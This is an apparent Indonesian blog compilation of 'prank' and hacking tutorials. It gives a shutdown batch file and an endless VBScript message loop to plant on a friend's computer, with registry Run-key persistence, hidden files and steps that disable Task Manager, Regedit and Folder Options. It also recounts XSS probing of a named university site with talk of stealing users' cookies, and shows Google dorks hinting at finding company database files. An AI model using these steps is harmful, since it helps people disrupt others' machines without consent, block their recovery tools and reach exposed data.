Pada part 2 ini, teman Anda akan Anda kerjain sendiri dengan cara yang menakutkan. Huakakakakk.. Jika teman anda termasuk kategori low-level dalam dunia komputer, dijamin dia pasti ngomong “Ya ampun… Hebat cuyy! Komputer gw ada jin & jun nya…”

Whaaaattttt?? Dengan segera Ghost Buster pun datang untuk melihat komputer teman Anda. Dan mereka pun berkata “OMG!! Call Shakira immediatelly please. There’s genie in a bottle (CPU)”. Dan kemudian Shakira pun datang dan menyanyikan lagu Genie In a Bottle dengan tujuan jin dalam komputer teman Anda mau keluar dan mengabulkan permintaan Anda…

So, gimana caranya memasang ‘jin’ dalam komputer teman Anda? Maka dari itu, Anda harus menjadi ‘jun’.

Buka Notepad dan ketikkan 1 baris script berikut.

Shutdown.exe –s –f –t 5 –c “I’m Genie in your CPU.. I’m so tired today.. I wanna sleep n terminated myself.”

Selesai. Save dengan nama terserah namun beri ekstensi .bat pada textbox FileName. Misalnya Jin.bat. Coba jalankan ‘jin’ nya dan lihat hasilnya…. Huakakakakak!! Hati-hati.. Dalam 5 detik komputer teman Anda akan segera off. Hmmm, letakkan ‘jin’ tersebut di direktori StartUp User supaya dia bekerja setiap komputer dinyalakan. (baca Mengerjai Komputer Teman Part 1 supaya lebih jelas).

Knowledge

Shutdown merupakan program yang terdapat pada direktori WindowsSystem32 dengan nama asli Shutdown.exe. Program ini memiliki beberapa parameter penting dan opsional. Pada contoh di atas, terdapat 2 parameter penting ( –s dan –t ) serta 2 parameter opsional ( –f dan –c ).

Parameter –s : artinya menyuruh program shutdown.exe supaya menggunakan mode shutdown (tanpa restart).
Parameter –t : artinya shutdown.exe akan melakukan shutdown setelah t detik. Pada contoh di atas, dalam hitungan 5 detik komputer akan dimatikan.

Coba beri nilai yang lebih besar, misalnya 100 detik. Hasilnya seperti gambar di atas namun dengan message yang berbeda. Initiated by ditentukan oleh siapa yang memanggil shutdown.exe tersebut. Jika dipanggil oleh user, maka isinya bukan NT AUTHORITYSYSTEM melainkan nama user yang sedang aktif.

Parameter –f : artinya memaksa komputer agar shutdown walaupun ada aplikasi atau program lain masih berjalan. Bahkan yang hang pun akan segera di matikan.
Parameter –c : artinya…cuma pesan atau komentar doank kok….hahaha.

Untuk melihat parameter yang lain, masuk ke cmd. Start >> run >> cmd [enter]. Ketik shutdown /? 

CARA PENANGANAN

Ketika pesan shutdown tersebut sedang aktif, jika ingin membatalkannya langsung ke Start >> Run >> shutdown –a [enter]. Parameter –a akan melakukan abortion atau pembatalan proses shutdown. Ingat, hanya berlaku JIKA WAKTU SHUTDOWN MASIH TERSISA BEBERAPA DETIK. Jika sudah lewat dari waktu yang ditetapkan, maka komputer akan dimatikan.

-sky73rx3 a.k.a sky73rx7-

Artikel ini sebenarnya sudah lama, sejak tahun 2005 silam. Lama banget kan?? Huakakakaakk… Pada tahun 2005 lalu, saya sempat memposting artikel yang judulnya sama dengan ini pada blog FS. Cuma telah saya hapus. So, sengaja saya tulis ulang agar nyambung (part nya).

Pada part 1 kali ini, kita akan belajar (kita???) bagaimana mengerjai komputer teman sendiri (jahat yaak??). Masih sama dengan yang dulu, kali ini kita akan menampilkan sebuah pesan kepada yang empunya komputer (baca: korban). What message? Terserah… Jika pada artikel yang dulu pesan ditampilkan menggunakan notepad, maka kali ini saya ganti menggunakan kotak dialog. Di samping itu, penampilan pesannya juga memakai logika (baca: programming).

Okay, mari kita mulai…hehehehe.

Peralatan:
*) Komputer, mouse, keyboard
*) Speaker (klo mo sambil dengerin lagu)
*) AK-45, Bazooka, C4, Magnum, Tank (korban kekerasan game)

Langkah 1.
Buka notepad. Start >> Run >> notepad [enter]

Langkah 2.
Ketik visual basic script di bawah ini.

Dim tanya, jawab
tanya = Msgbox("Bayar utang lo!!! Hari senin yee??",vbYesNo)
Do
   if tanya = vbYes then
       jawab = OK
       Msgbox("Nah gitu donk!!!")
       'Exit Do atau Wscript.Quit
   else
       jawab = Ngocol
       MsgBox("Lah, bandel amat sehhh???!!!!")
   end if
Loop While jawab = Ngocol Or jawab = OK

Setelah itu, simpan dengan nama bebas asalkan dengan ekstensi .vbs seperti gambar di bawah ini. Misalnya System.vbs. Setelah itu, ambil AK-45 Anda dan coba klik 2x dan lihat hasilnya….. (saya gak tanggung jika kepala Anda meledak dan otak Anda berceceran sampai ke WC!!!).

Hasil dari eksekusi file System.vbs tersebut adalah pertama kali korban akan ditanya secara gak sopan. Nah, jika korban menjawab Yes, maka akan keluar pesan berikutnya “Nah gitu donk!!!”. Namun, jika yang dijawab adalah No, maka pesan yang keluar adalah “Lah, bandel amat sehhh???!!!!”. Baik kedua pesan Yes maupun No, salah satunya, akan diulang terus menerus sampai Anda nangis (Emang Gua Pikirin – Maia). Walaupun tanda ‘x’ pada dialog nya ditekan, percuma! Pesan akan muncul terus.

Jika ingin berbaik hati kepada korban, lihat perintah yang berwarna hijau. Ada tanda single quote (‘) di depannya. So? Hilangkan tanda tersebut dan PILIH antara Exit Do
atau Wscript.Quit. Kemudian save dan jalankan. Kali ini ketika korban mengklik tombol Yes, maka akan muncul pesan berikutnya sebanyak 1x saja. Setelah itu program akan keluar. Jika jawab No? Tebak sendiri…..

Gimana supaya pesan tersebut aktif ketika komputer startup? Simple. Ada 5 tingkatan.

D2
Ngomong ke empunya komputer dan bilang “Mas/mbak/woy/coy, file yang ini tiap lo login ke komputer, jalanin ya! Klik aja 2x. Ok”

D3.
Masuk ke explorer dan arahkan direktori ke C:Documents and Settings\All Users\Start Menu\Programs\Startup. Lantas, copy kan file System.vbs tadi ke direktori tersebut.

S1.
Start >> run >> regedit [enter].
Masuk ke key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
Klik kanan pada window sebelah kanan dan pilih New >> String Value.
Beri nama “Tagih Hutang” (tanpa tanda kutip).
Setelah itu, klik 2x dan isi nilainya dengan C:Windows\System32\System.vbs
Copy kan file System.vbs ke direktori tersebut (C:\Windows\System32\System.vbs) dan set atributnya menjadi Hidden. Caranya? Ampun dehhh… Klik kanan file nya dan pilih properties. Centangkan checkbox Hidden.

S2.
Lakukan langkah S1 di atas.
Masuk kembali ke registry dan arahkan key ke HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer.
Buat atau edit (jika sudah ada) data Dword yang namanya NoFolderOptions dan beri nilainya 1. Jika belum ada, klik kanan pada window sebelah kanan dan pilih New >> DWORD Value. Ganti namanya menjadi NoFolderOptions dan beri nilai 1. Perhatikan gambar di bawah ini.

Kemudian, masuk ke TaskManager (Ctrl+Alt+Delete) dan buka tab Processes. Matikan sementara proses yang bernama explorer.exe. Jangan kaget dan jangan merasa bodoh. Lanjut….
Masih pada TaskManager, klik File >> Run >> explorer. Dan coba buka Windows Explorer dan klik menu Tools >> Folder Options. Apakah menu tersebut ada????? Dengan begini, korban yang otaknya masih S1 tidak akan bisa menemukan file System.vbs yang di hidden-kan tadi.

S3.
Lakukan langkah S1 dan S2 di atas.
Masuk ke registry dan arahkan key ke HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System.
Buat atau edit (jika sudah ada) data Dword yang namanya DisableTaskMgr dan DisableRegistryTools dan beri nilainya 1. Jika belum ada, seperti biasa, klik kanan dan pilih DWORD Value. Beri nama DisableTaskMgr dan isi nilainya dengan 1. Begitu juga dengan DisableRegistryTools.

Insane!!!
Ooppsss… Untuk tahap Insane ini sudah sangat ekstrim. Yaitu membuat TaskManager menjadi notepad jika dibuka. Atau membuat Winamp langsung dijalankan jika Regedit dibuka. Hmmm,,mendisable Start >> Run juga bisa. Tapi ini tidak dijelaskan di sini karena judulnya hanya “mengerjai”….hehehehehe. Tahap Insane ini sudah mengadopsi intelijen virus so tidak saya bahas di sini. Wakakaaakk….

CARA PENANGANAN

Jika pesan tersebut terus menerus muncul (iyalah…), maka Anda tamat. Hahahaha… Nope! Just open Task Manager (Ctrl+Alt+Delete) dan pilih tab Processes. Cari proses yang namanya wscript.exe. Matikan proses tersebut dan pesan sialan pun akan segera berakhir.

WARNING
Jika tahap S3 Anda coba di komputer Anda, pastikan Anda mengerti mengenai komputer lebih dalam. Whad da poin?? Misalnya, jika file System.vbs itu sedang berjalan (baca: nagih hutang) dan registry editor beserta task manager Anda dalam keadaan disabled, maka untuk mematikan proses wscript.exe tidak bisa dilakukan melalui task manager bukan? So, Anda harus ngerti “jalan belakang” bagaimana cara untuk mematikan wscript.exe tersebut.

Knowledge
Wscript atau Windows Scripting Host akan meng-handle file visual basic script (*.vbs). Jika ada virus yang ekstensinya .vbs, maka untuk mematikannya cukup matikan proses yang bernama wscript.exe pada TaskManager.

-sky73rx3 a.k.a sky73rx7-

Dalam dunia internet, tak ada yang namanya benar-benar aman 100%. Meski telah dilindungi oleh AntiVirus dengan definisi update terkini, 7 lapis firewall dari langit ketujuh, patch management, dan entok-entok lainnya takkan mampu menangani yang namanya serangan seorang hacker yang bersungguh-sungguh. Telah terbukti pada situs KPU yang konon katanya menghabiskan dana ratusan milyar hanya untuk pengamanan akses internet. Toh, dana tersebut paling-paling cuma ditampung oleh orang-orang yang berwenang yang tak mengerti arti dari kata “keamanan” internet itu sendiri.

Dalam artikel kali ini penulis akan membawa tema dengan judul XSS (Cross-Site Scripting) yang sebenarnya merupakan teknik yang sama yang dilakukan oleh Xnuxer ketika meng-hack KPU. Namun, bukan teknis tentang hack KPU yang akan saya bahas di sini melainkan pada aplikasi server ASP.NET. Dan pada contoh kali ini saya akan membawa suatu situs bermasalah, www.binusmaya.binus.ac.id

Bug XSS pada situs ini Saya temukan tahun 2005 silam. Situs untuk pembelajaran para mahasiswa dari Universitas Bina Nusantara ini ternyata tidak luput dari yang namanya bug. Sebelumnya saya sendiri sempat bangga terhadap BiNus karena aplikasi situs mereka diserahkan pada sisi server dan ruangan servernya memang dikhususkan untuk itu. Tapi, apa rasa bangga tersebut tidak melahirkan suatu pemikiran yang “nakal” bagi saya?

Okay, langsung aja. Cukup basa basinya. Kali ini penulis harus terlebih dahulu masuk ke binusmaya tersebut. Setelah login secara sah dan benar, maka penulis (cut, ulang.red). Kali ini saya harus terlebih dahulu masuk ke binusmaya tersebut. Setelah login secara sah dan benar, maka saya akan diantarkan ke halaman berikut:

www.binusmaya.binus.ac.id/default.aspx.
.aspx merupakan ekstensi untuk pemrograman web ASP.NET.

Di halaman ini saya tak berani macam-macam karena saat saya memasuki halaman .aspx tersebut, saya langsung terkoneksi ke server binus dan langsung ditangani oleh server. Jadi tak bijaksana rasanya kalo saya memainkan javascript nya. Lalu, saya mencoba masuk ke salah satu mata kuliah dan masuk ke bagian forum diskusinya. Berikut adalah URL yang saya dapatkan setelah saya berada di forum diskusi dan membaca salah satu topik yang ada. (saat ini sudah tidak valid)
http://forum.binus.ac.id/ViewTopic.aspx?tid=rSHfJy%2bx0ZP547Dn8Yis4g%3d%3d

Yang saya mark dengan tulisan miring adalah ID untuk topik yang bersangkutan.

Perlu dicatat juga bahwa forum diskusi ini berupa popup yang akan membuka jendela browser baru. Jadi dapat disimpulkan bahwa aplikasi ini secara tidak langsung terpisah oleh halaman utama. Nah, waktu itu saya sempat menuliskan suatu topik namun terlanjur terkirim sehingga postingan saya di forum diskusi tersebut langsung terpampang dengan jelas. Jelas donk, pikiran yang terlintas di benak saya pertama kali yaitu “bagaimana caranya menghapus” posting tersebut?

Ada yang unik di sini karena di sinilah saya menemukan adanya bug XSS pada situs ini. Yang saya lakukan untuk mengetes system binusmaya ini adalah dengan mencoba memasukkan karakter atau perintah tambahan pada URL nya. Jadi, lengkapnya URL tersebut menjadi seperti ini:
http://forum.binus.ac.id/ViewTopic.aspx?tid=rSHfJy%2bx0ZP547Dn8Yis4g%3d%3d/

Yup, saya menyisipkan tanda backslash pada akhir URL tersebut. Apa yang terjadi? Ini dia page error nya:

Terlihat ternyata server “bereaksi” dengan perintah yang saya berikan. Sebenarnya ini bukanlah sebuah error yang kritis, karena ini hanyalah sebuah peringatan dari web server ASP.NET tentang adanya “sesuatu” yang belum dikonfigurasi. Sesuatu? Iya, sesuatu yang bila dibangkitkan akan menampilkan “sesuatu” lagi.

Dari error yang ada, saya coba teknik error producing untuk mengetahui informasi yang lebih tentang situs ini. Maka, saya kembali ke halaman sebelumnya. Kemudian saya melihat properties salah satu topik yang ingin saya hapus (tentunya topik milik saya). Eitt, jangan pusing mana propertiesnya. Propertiesnya bisa dilihat dengan cara klik kanan pada link topik yang ingin dibaca. Dan ternyata linknya sama dengan URL yang sedang aktif. Maka, untuk membangkitkan sebuah error lagi, saya copy pastekan link tersebut tepat dibelakang URL aktif saat ini. Tentunya dengan disisipkan backslash terlebih dahulu. Sehingga URL-nya menjadi:
http://forum.binus.ac.id/ViewTopic.aspx?tid=rSHfJy%2bx0ZP547Dn8Yis4g%3d%3d/del.ViewTopic.aspx?tid=rSHfJy%2bx0ZP547Dn8Yis4g%3d%3d

Setelah saya tekan Enter, ternyata server masih memiliki reaksi. Kali ini reaksinya lebih dalam (mungkin jatuh cinta sama komputer saya ).
Berikut adalah page-nya.

Ooppsss….kebocoran informasi nih. Terlihat bahwa mereka memakai .NET Framework versi 1.1 dan belum di update ke versi 2.0 (mungkin karena alasan maintenance). Tidak hanya itu, kini saya mengetahui trace untuk melakukan hack lebih lanjut. Perhatikan stack trace nya. Ini kunci untuk membuka celah lebih dalam.

Belum, saya belum bisa memvonis bahwa system binusmaya rentan terhadap XSS. Maka dari itu untuk menjawab keraguan saya, saya coba teknik error producing lagi. Kali ini memanfaatkan stack trace yang ada.

Sehingga URL yang telah saya tambahkan menjadi:
http://forum.binus.ac.id/ViewTopic.aspx?tid=rSHfJy%2bx0ZP547Dn8Yis4g%3d%3d/del.ViewTopic.aspx?tid=rSHfJy%2bx0ZP547Dn8Yis4g%3d%3d/del.<b>BLMS.Forum.Web.ViewTopic.OnInit(EventArgs%20e)%20+13<b>

Semakin jelas bukan? Saya membuat sebuah error dengan menambahkan format tag HTML yang menginstruksikan kepada browser untuk menampilkannya tercetak tebal (<b>). Namun, apa yang terjadi? Memang tidak dicetak tebal namun ternyata instruksi itu diartikan sebagai instruksi yang kritis. Bingung? Ini sama aja konsepnya dengan mencetak kalimat dengan huruf tebal supaya mendapat perhatian khusus dari orang yang membacanya. Ini lah yang terjadi pada system binusmaya.

Woi, bukannya format tag bold HTML di atas salah? Hehe, memang sengaja tidak saya tulis yang benar. Ingat, ini adalah teknik error producing untuk membangkitkan error. Sedangkan format untuk mencetak dalam keadaan bold, yang benar itu dimulai dengan tag <b> dan diakhiri dengan tag </b>

Lalu, apa yang terjadi ketika URL tersebut dieksekusi? Ya…peluang untuk serangan Cross Site Scripting telah tercipta tanpa ada yang menyadarinya. Berikut adalah pesan error yang ditampilkan:

Dari gambar di atas, terlihat adanya kemungkinan terjadinya serangan XSS. Dan ditampilkan pula stack trace yang baru yang bila saja saya gunakan untuk menggali lebih dalam, ada kemungkinan saya melakukan take over terhadap system binusmaya.

Jadi, secanggih apapun aplikasi yang diterapkan oleh sebuah server dan databasenya, jika ada sedikit saja celah logika pada pemrogramannya, masalah tersebut bisa menjadi masalah yang sangat besar ketika kita tak menyadarinya. Berbekal dengan adanya hole security di binusmaya ini, saya telah melaporkan bug ini kepada yang berwenang (bukan polisi lho) dan bug tersebut telah diperbaiki dengan cepat.

Jika saja dan hanya jika saya berniat untuk melakukan hal yang selangkah ke depan, bisa saja saya melakukan XSS yang lebih berbahaya. Jadi, maksud kamu? Iya, apa yang saya sampaikan di atas bukanlah serangan XSS!! Sekali lagi bukan!!! Itu hanyalah jalan penunjuk saja. Bisa diibaratkan bahwa saya telah mengetahui bahwa situs tersebut memiliki lubang keamanan terhadap XSS.

XSS adalah suatu pola penyerangan website dari sisi client. Sehingga bila saya telah berhasil menyerang binusmaya dengan XSS, apa yang saya lakukan pada browser saya tidak akan sama dengan browser orang lain. XSS digunakan untuk memunculkan “sesuatu” setelah disisipkan “sesuatu”. Jadi, XSS tak berbahaya sama sekali donk? Untuk contoh kali ini, memang tidak. Tapi bahaya yang lebih besar akan terjadi jika saya menyisipkan suatu script pada URL-nya untuk mencuri cookies dari pengguna binusmaya (mahasiswa, dosen, administrator, webmaster).

Contoh, ketika A login ke binusmaya dengan link yang telah saya modifikasi, secara tak sadar si A akan saya sadap cookiesnya. Jika saya terlalu sibuk untuk menunggu korban, saya bisa saja membuat sebuah script yang akan saya tulis pada URL nya untuk mengirimkan cookies dari korban ke email saya. Jadi ketika saya selesai mandi, bertaburan sudah email yang sekaligus menjadi tiket buat saya untuk masuk sebagai orang lain yang padahal saya sama sekali tak tahu password dan NIM nya. Ingat, cookies mengandung informasi yang sangat berharga termasuk password!!

Okay, sampai di sini dulu artikel ini. Ketemu lagi di artikel mendatang. Untuk kepada pihak yang merasa dirugikan termasuk pihak Bina Nusantara, penulis mohon maaf. Karena pada dasarnya artikel ini ditulis hanya untuk sebagai pembelajaran saja bagi yang masih awam tentang teknologi pada umumnya dan internet security pada khususnya.

Sekali lagi, teknik ini sudah tak berlaku lagi di binusmaya. Webmaster binusmaya yang telah saya laporkan tentang adanya bug ini telah menutup celah tersebut beberapa hari kemudian.

Hacking bukan hanya sekedar teori.

-sky73rx3 a.k.a sky73rx7-

Huaahaaiiiii… Kembali lagi saya menuliskan artikel dari kaum golongan bawah tanah. Kali ini saya akan melakukan pencurian data berupa file mp3 dari internet. Pada artikel yang lalu, Google vs LimeWire, telah saya singgung bagaimana menggunakan Google untuk mencari dan mendownload musik apapun tipe nya. Juga telah saya singgung resiko menggunakan LimeWire.

Okay, masih pada bahasan yang sama, hasil dari query Google terkadang membawakan kita ke situs yang menjalankan file musik (mp3) nya dengan Flash Player. Sedangkan artikel yang lalu, musik dijalankan langsung memakai Quick Time atau player sejenis yang terinstal di komputer Anda. Dan proses pencurian musiknya pun tergolong mudah. Tinggal copy-paste saja link address nya dan browser akan men-download file tersebut.

Pertanyaan selanjutnya dari kutu rambut saya, gimana caranya mengambil musik yang dijalankan menggunakan Flash Player? Jika melakukan aksi klik kanan pada Flash Player tersebut, maka tidak akan ketemu menu Copy Link Address maupun Save Target As. Tidak hanya itu, pada situs www.listen77.com, programmer web mereka menggunakan script agar para pencuri seperti saya tidak bisa melakukan aksi klik kanan. Ya, berhasil. Mereka membuat kutu rambut saya minta dibasmi dengan shampo Clear. Tapi sial bagi mereka, browser Opera menolong saya. Akhirnya saya tidak harus keramas hari ini.

Berikut adalah script anti klik kanan tersebut.

<script LANGUAGE=”Javascript”>

var isNS = (navigator.appName == “Netscape”) ? 1 : 0;
var EnableRightClick = 0;
if(isNS) document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
if(EnableRightClick==1)
{ return true; }
else {return false; }
}

function mousehandler(e) {
if(EnableRightClick==1) {return true; }
var myevent = (isNS) ? e : event;
var eventbutton = (isNS) ? myevent.which : myevent.button;
if((eventbutton==2)||(eventbutton==3)) return false;
}

function keyhandler(e) {
var myevent = (isNS) ? e : window.event;
if(myevent.keyCode==96) EnableRightClick = 1;
return;
}

document.oncontextmenu = mischandler;
document.onkeypress = keyhandler;
document.onmousedown = mousehandler;
document.onmouseup = mousehandler;

</script>

Script anti klik kanan ini telah mengalami kemajuan dari beberapa tahun silam. Teknik memainkan mouse untuk menjebol proteksi anti klik kanan pun tidak berlaku lagi. Sekedar informasi saja, kita bisa menggunakan tombol mouse untuk menjebol proteksi anti klik kanan pada suatu website (jangan pernah berpikir kalau hacking hanya bisa dilakukan menggunakan software saja). Namun, untuk script ini, bukan hanya mouse saja yang telah ‘dimatikan’ tombol kanannya, keyboard juga telah diproteksi. Lihat tulisan yang telah saya mark dengan warna merah. Terdapat handle untuk event keypress. Artinya, penekanan tombol pada keyboard juga ‘dimonitor’ oleh script ini.

Okay, saya tidak akan menjelaskan satu per satu arti dari script di atas. Silahkan mencari referensi sendiri di internet. Berikutnya akan saya tunjukkan script yang menyimpan informasi lagu yang sedang dijalankan pada browser.

<script type=”text/javascript”>

var so = new SWFObject(“listen77.swf”, “mymovie”, “192″, “67″, “7″, “#FFFFFF”);
so.addVariable(“autoPlay”, “yes”);
so.addVariable(“soundPath”, “http://www.esnips.com/nsdoc/9506f82d-0a85-450f-bc42-cb1998d17cae/?id=1203018889968″);
so.write(“flashPlayer”);

</script>

Lihat tulisan yang berwarna merah. Terdapat variabel
soundpath yang diisi dengan “http://www.esnips.com/nsdoc/9506f82d-0a85-450f-bc42-cb1998d17cae/?id=1203018889968″. Bingo!! Ternyata lagu yang diputar tidak langsung diambil dari situs www.listen77.com melainkan www.esnips.com. Tinggal copy-paste kan saja alamatnya ke address bar browser dan tekan Enter. Dengan segera proses download pun akan segera dijalankan.

Okay.. Sekian tutorial singkatnya. Untuk melihat video nya secara langsung dari monitor saya, silahkan download video nya di http://www.wikifortio.com/854917/Menjebol Data Musik Pada Flash Player.zip. Expired pada hari Rabu, 14 Mei 2008 08:32:28. Size 26.0 MB (zipped). Resolusi video 1024×768. Happy download…^,^

-sky73rx3 a.k.a sky73rx7-

Sebelum membaca secara tuntas artikel ini, pastikan Anda telah membaca artikel yang sama pada http://sky73rx3.blogspot.com/2008/01/break-limewire-with-google.html. Pada artikel yang ini, saya akan mengupasnya dari sisi learning.

Dalam video yang telah Anda saksikan, kita menggunakan Google untuk mencari file yang lebih spesifik. Namun, tentunya, dengan keadaan yang berbeda. Di sini kita membicarakan Google Hack. Ya, search engine terkemuka seantero planet saya ini memang sangat powerful. Selain untuk mencari data-data Anda ketika Anda menghadap bagian HRD (ya, dewasa ini, data-data mengenai Anda akan dicari di internet ketika Anda melamar kerja. Maka itu, mulai dari sekarang tanamkan image dan citra Anda yang baik-baik dari sekarang ), Google juga dapat digunakan untuk mencari file-file yang keberadaannya dianggap “rahasia”.

Berikut adalah level dasar untuk menggunakan Google sebagai mesin pencari yang handal (atau juga bisa digunakan untuk membunuh Anda )

Google tidak “case sensitive”.
Keyword: babon = BABON = bABoN
Akan menghasilkan hal yang sama

AND: Secara Default Google menggunakan keyword AND.
Keyword: menjadi Sylar sama aja dengan menjadi AND Sylar
Hasilnya pencarian akan mengandung kata “menjadi” dan “Sylar”. Contohnya: “menjadi bencong”, “dia menjadi”, “tokoh Sylar”, “Sylar itu”, dlsb.

OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah satu dari keyword. Note: OR dituliskan dengan huruf besar semua.
Keyword: hacker OR cracker
Hasilnya pencarian akan mengandung kata “hacker” ATAU “cracker”

+: Google akan mengabaikan pencarian dengan kata-kata UMUM seperti “how” dan “where”.
Jika kata-kata umum ini begitu penting, anda bisa menambahkan “+” di depan keyword tersebut.
Keyword: hacker how     Kata “how” akan diabaikan.
Keyword: hacker +how     Kata “how” akan diikutsertakan

-: Tanda minus “-” bisa digunakan untuk mengecualikan kata-kata tertentu dalam pencarian.
Misal kita ingin mencari kata “keset” namun tanpa ada “kaki” nya.
Keyword: keset -kaki
Hasilnya pencarian akan mengandung kata “keset” tanpa “kaki”. Coba bandingkan dengan operator + (keyword: keset +kaki)

*: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari suatu kata yang memiliki kata depan menja*. Google tidak mencari kata “menjamu”, “menjadi”, “menjalar”, dll. Google akan menghasilkan pencarian hanya yang mengandung kata “menja”.

Tetapi google mendukung penggunaan * dalam pencarian kalimat.
Keyword: “menjadi * hacker”
Hasilnya pencarian dapat menghasilkan “menjadi seorang hacker“, “menjadi white hacker“, dll.

“”: Dapat digunakan untuk mencari kata yg lengkap.
Keyword: “menjadi hacker”.
Hasilnya pencarian akan mengandung kata “menjadi hacker”

?: Dapat digunakan untuk mencari direktori Google.
Keyword: ?intitle:index.of? mp4

Pusing? Jangan dulu yaak. Berikut adalah operator-operator spesial yang dapat digunakan untuk memperinci pencarian.
*) intext
*) intitle
*) allintitle
*) inurl
*) allinurl
*) site
*) cache
*) define
*) filetype
*) link
*) related
*) phonebook

Penggunaannya pun tidak harus monoton (satu-satu gitu). Bisa digabung kok.
Misalnya echy intitle:friendster * +heroes. Artinya, Google akan mencari semua halaman web yang memiliki data/isi (bukan URL) mengenai echy dan di dalam data tersebut terdapat tulisan heroes dan memiliki judul friendster.

Kembali ke bahasan utama, yaitu penggunaan operator intitle, – (minus), ” ” (double quote), dan titik ( . )
Keyword: intitle:”index.of” (mp3|mp4|avi|mpeg4|bmp|png) Aku.Cinta.Jakarta –html –htm –cfm –php –asp –aspx –jsp –cfArti dari keyword tersebut yaitu:
1) Google akan mencari dengan mode intitle
2) Kemudian pencarian dilakukan dengan terlebih dahulu memfilter berdasarkan index suatu website.
3) Kemudian, proses filter berikutnya adalah jenis file yang ingin dicari. Baik itu mp3, mp4, dlsb.
4) Kemudian, proses filter berikutnya yaitu pencarian data. Di sini saya mencari lagu Aku Cinta Jakarta. Dan supaya Google tidak memisah kata tersebut, maka kita gunakan tanda titik. Sehingga Google akan benar-benar melakukan pencarian “Aku Cinta Jakarta”. Jika tanpa tanda titik, maka pencarian akan lebih luas. Google akan mencari lagu yang memiliki nama file “Aku”, “Cinta”, dan “Jakarta”.
5) Proses filter berikutnya yaitu kita menyuruh agar Google membuang hasil query (pencarian) nya yang memiliki informasi berupa html, htm, php, asp (Active Server Pages), jsp (Java Server Pages), cf (cold fusion), dlsb.Well, selesai sudah. Yang jadi pertanyaan berikutnya adalah…”apa jadinya jika yang dicari adalah file database (mdb, mdf) perusahaan? Tentunya ada data-data finansial bukan?”

Yah, itu sehh terserah Anda. Saya tidak mengajarkan Anda untuk menjadi maling rendahan pada artikel ini. Saya juga tidak mengajak Anda untuk melakukan hal yang merusak image ataupun citra orang lain pada artikel ini. Semua yang Anda terima pada artikel ini adalah murni berupa ilmu pengetahuan saja. Dan saya sebagai penulis tidak bertanggung jawab atas dampak atau efek samping yang ditimbulkan dari artikel ini. Use your own risk!

Hacking, bukan sekedar teori.
-sky73rx3 a.k.a sky73rx7-

Karena banyaknya permintaan dari teman-teman saya dari dari berbagai golongan dan kampus, artikel dengan judul Menjebol Proteksi Klik Kanan ini akan saya ulas kembali dengan menambahkan beberapa perubahan.

Beberapa waktu yang lalu ada seorang teman saya menanyakan tentang sebuah website yang gambar atau image di dalamnya tidak bisa di simpan ke media penyimpanan, misalnya harddisk. Lantas, saya menanyakan apa yang ditampilkan oleh browser ketika gambar tersebut di klik kanan dan ia menjawab bahwa browser tersebut menampilkan pesan yang berbunyi:
“I’m so sorry. My pictures protected from save action. If you want to save my pics, you must already registered or you’re a member”

Dari pesan tersebut, tampaknya si webmaster telah melakukan aksi anti klik kanan. Dalam pesan tersebut juga diberitahukan jika ingin melakukan saving pada gambar tersebut, user haruslah menjadi member terlebih dahulu dan tentunya akan ada “ongkos” yang akan dikeluarkan.

Proteksi ini sama sekali tidak ada hebatnya. Benar, saya tidak bohong. Bingung? Yes, saatnya bingung.
Untuk memperjelas, bukalah notepad dan ketikkan script berikut.

<HTML>
<HEAD>
<title>Tanggal</title>
</HEAD>
<body>

Tanggal dan Jam hari Ini :
<script language=javascript runat=client>
d=new Date() ;
document.write (d) ;
</script>

<script language=JavaScript>
function anti_klik_kanan() {
if (event.button==2) { alert(‘Ini adalah proteksi anti klik kanan sederhana’); }
}

document.onmousedown=anti_klik_kanan;
</script>

</body>
</html>

Save as dengan nama anti klik kanan_1.htm. Jangan lupa ekstensi .htm nya karena kita akan membuat sebuah halaman website sederhana yang hanya akan menampilkan waktu. Jika sudah, buka atau eksekusi file tersebut (klik 2x filenya di lokasi direktori penyimpanan). Maka browser akan terbuka. Bagi yang mendapatkan pesan security tentang active content, klik pesan berwarna bar kuning tersebut dan pilih Allow active content. Jika ada pertanyaan, jawab aja dengan Yes/OK. Tenang aja, dalam script di atas tidak ada active content yang berbahaya.

Kemudian, setelah script bekerja dengan menampilkan waktu saat ini (dari sisi client), coba klik kanan halaman web tersebut. Akan ada muncul pesan yang tujuannya adalah memblokir aksi klik kanan yang dilakukan oleh user. Jika sudah begini, kita tidak akan bisa menjadi pengcopy-paste setia donk???

Okay, simpan dulu halaman tersebut. Untuk perbandingan berikutnya, buka kembali notepad dan ketikkan script berikut.

<html>
<head>
<title>Hey you damn asshole</title>
</head>

Hey you damn asshole!! Try to right-click your mouse and see what happen with your fuckin’ browser

<SCRIPT language=JavaScript1.1>
<!– Mulai script –>

function right(e) {
if (navigator.appName == ‘Netscape’ && (e.which == 3 || e.which == 2)) return false;
else if (navigator.appName == ‘Microsoft Internet Explorer’ && (event.button == 2 || event.button == 3)) {
alert(“Haha…gak boleh curang yee…”); return false;
}
return true;
}

document.onmousedown=right;
document.onmouseup=right;
if (document.layers) window.captureEvents(Event.MOUSEDOWN);
if (document.layers) window.captureEvents(Event.MOUSEUP);
window.onmousedown=right;
window.onmouseup=right;
<!– Script berhenti –>

</SCRIPT>
</body>
</html>

Catatan penting:

Perhatikan tanda komentarnya. <!– dan –>. Biar saya perjelas. Yang ditulis adalah < ! – - dan – - >. Jadi, bukan tanda garis panjang melainkan ada dua garis minus ( – - ). Tapi penulisannya tidak ada spasi.

Save as dengan nama anti klik kanan_2.htm. Lantas jalankan file tersebut. Jika ada security warning, lakukan seperti hal di atas. Kini, coba lakukan klik kanan. Tampil pesan bukan? Lalu apa bedanya dengan yang pertama? Sabar dulu. Sekarang coba buka www.detik.com dan pilih News. Baca salah satu topik yang ada dan setelah masuk ke topik tersebut, coba klik kanan. Apa yang terjadi? Apakah ada pesan? Atau coba buka 17tahun.com. Apa ceritanya bisa di copy-paste? Bisakah klik kanan dilakukan?

Okay, kini kita telah mendapatkan gambaran mengenai 3 skenario disable right click oleh webmaster. Lantas, saatnya mendobrak proteksi tersebut.

